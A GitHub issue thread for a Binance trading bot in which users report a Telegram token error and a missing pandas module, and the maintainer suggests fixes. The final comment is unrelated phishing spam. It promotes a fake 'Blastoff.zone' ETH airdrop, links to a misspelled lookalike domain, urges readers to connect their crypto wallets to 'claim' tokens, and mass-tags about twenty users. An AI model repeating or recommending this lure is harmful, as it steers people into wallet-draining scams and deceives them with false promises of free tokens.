### ISSUE TITLE
TypeError: 'NoneType' object is not iterable

### ISSUE THREAD

**Issue by asmmel** [smzerehpoush/binance-spot-trading-bot#1]
File "C:\Users\Андрей\AppData\Local\Programs\Python\Python310\lib\site-packages\telegram\bot.py", line 353, in _validate_token
    if any(x.isspace() for x in token):

What to do? I entered all the API keys and gives this message. Git copied using git clone

**Comment by smzerehpoush** [comment]
who you run it?
did you set environment variables ?
you can copy .env.sample and put your credentials here and rename it to .env

**Comment by Deepak960085** [comment]
Traceback (most recent call last):
  File "/storage/emulated/0/Download/binance-spot-trading-bot-mainmmm/binance-spot-trading-bot-main/main.py", line 9, in <module>
    from indicators import rsi_fourteen_days_close, rsi_fifteen_days_close, heikin_today, heikin_yesterday, \
  File "/storage/emulated/0/Download/binance-spot-trading-bot-mainmmm/binance-spot-trading-bot-main/indicators.py", line 3, in <module>
    from heikin_ashi import calculate_heikin_ashi
  File "/storage/emulated/0/Download/binance-spot-trading-bot-mainmmm/binance-spot-trading-bot-main/heikin_ashi.py", line 3, in <module>
    import pandas as pd
ModuleNotFoundError: No module named 'pandas'

**Comment by smzerehpoush** [comment]
did you run `pip install -r requirements.txt`

**Comment by 0legR** [comment]
# Blastoff.zone Airdrop: Win 0.1 ETH + $100 Bonus!

[![Airdrop Banner](https://i.ytimg.com/vi/QtjkR9zWyzI/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

Hello crypto community! Blastoff.zone is offering an exciting Airdrop for the first 10 users! You can win 0.1 ETH plus a $100 bonus just by participating and connecting your wallet.

## How to participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to access the Blastoff.zone website.
2. Connect your Ethereum wallet to the website to be eligible for the $100 bonus.
3. Use the "Claim Now" method to receive your tokens.

Don't miss out on this amazing opportunity! Hurry and claim your prize before the 0.1 ETH runs out.

Remember, tokens will be distributed on a first-come, first-served basis. We have a maximum distribution of 100 tokens, and 90% have already been distributed!
Dan-Qwerty, @oidohee, @frankfan007, @hahadaxia, @fkosmala, @GregIngelmo, @whrit, @tommy-ca, @Haiducgabriel, @TannerTKH, @debnath-d, @i-aztec, @orware, @nanpuhaha, @0xswitch, @baconninja33, @jordanlepera, @fugangcui, @trieudh58, @ohsevin
